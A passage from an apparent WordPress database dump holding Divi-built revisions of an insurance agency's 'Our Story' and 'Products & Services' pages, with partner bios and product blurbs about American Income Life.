hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"]<h2>Our Story</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][dsm_text_divider header=\"Partners\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" global_colors_info=\"{}\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"font-weight: 400;\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/justinsuttonheadshotsmall-Black-White.png\" title_text=\"justinsuttonheadshotsmall Black-White\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Justin Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Owner/Founder</span></em></p>\n<p><span style=\"font-weight: 400;\">Justin has worked in the financial services industry for over 8 years. In 2016 the Giddens Nation was formed, where Justin worked alongside brothers Ryan and Stephen, running a satellite office in Waco, TX, and eventually becoming the Senior Regional Director of the Giddens-Giddens Agency. In 2022 Justin formed J. Sutton Financial to extend the reach of the Giddens-Giddens agency into the 100% remote hemisphere of the Financial Services Industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Seth Ordeneaux</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Since starting with the company in April 2020, Seth has had the opportunity to learn from and develop some of the top leaders in our company. His ability to build relationships with his clients and colleagues has led him to become one of the Top managers in our industry, with several notable accomplishments from top representative to top manager in a very short amount of time.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Seth.jpg\" title_text=\"Seth\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Matthew-Sutton.jpg\" title_text=\"Matthew Sutton\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" custom_padding=\"||52px|||\" global_colors_info=\"{}\"]<h3><b>Matthew Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Matthew\'s career has been nothing short of incredible. With just 5 years in the financial services industry, Matthew has accomplished achievement after achievement. In recent years he has won two separate contests (March Madness/Battle of the Nation), and if that wasn\'t enough, he also leads one of the most powerful teams in our industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Andres Cano</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Andres\' career with J. Sutton Financial started in the middle of the pandemic. As a recent college graduate from the University of Texas at El Paso Andres found an opportunity to excel within a troubling job market at J. Sutton Financial. Andres is currently working with his team on the expansion of our Latino Division.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Andres-Cano.jpg\" title_text=\"Andres Cano\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','702-revision-v1','','','2023-04-08 21:38:39','2023-04-08 21:38:39','',702,'http://cmdev-site1.com/?p=882',0,'revision','',0),(913,3,'2023-04-11 21:42:28','2023-04-11 21:42:28','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Products &amp; Services</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"70%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_padding=\"20px|||||\" animation_style=\"flip\" animation_direction=\"right\" hover_enabled=\"0\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" header_text_color=\"#003372\" header_2_text_color=\"#003372\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" parallax=\"on\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_url\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" box_shadow_style_button=\"preset2\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-11 21:42:28','2023-04-11 21:42:28','',26,'http://cmdev-site1.com/?p=913',0,'revision','',0),(883,1,'2023-04-08 21:43:27','2023-04-08 21:43:27','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Products &amp; Services</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" header_text_color=\"#003372\" header_2_text_color=\"#003372\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" parallax=\"on\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" hover_enabled=\"0\" global_colors_info=\"{}\" width_last_edited=\"on|desktop\" sticky_enabled=\"0\" width_phone=\"50%\" width_tablet=\"50%\" module_alignment=\"center\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" hover_enabled=\"0\" global_colors_info=\"{}\" width_last_edited=\"on|phone\" sticky_enabled=\"0\" width_phone=\"50%\" width_tablet=\"50%\" module_alignment=\"center\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_url\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" box_shadow_style_button=\"preset2\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 21:43:27','2023-04-08 21:43:27','',26,'http://cmdev-site1.com/?p=883',0,'revision','',0),(885,1,'2023-04-08 21:46:31','2023-04-08 21:46:31','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Products &amp; Services</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" hover_enabled=\"0\" global_colors_info=\"{}\" width_last_edited=\"on|phone\" width_phone=\"50%\" sticky_enabled=\"0\" width_tablet=\"50%\" width=\"70%\" module_alignment=\"center\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" header_text_color=\"#003372\" header_2_text_color=\"#003372\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" parallax=\"on\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" 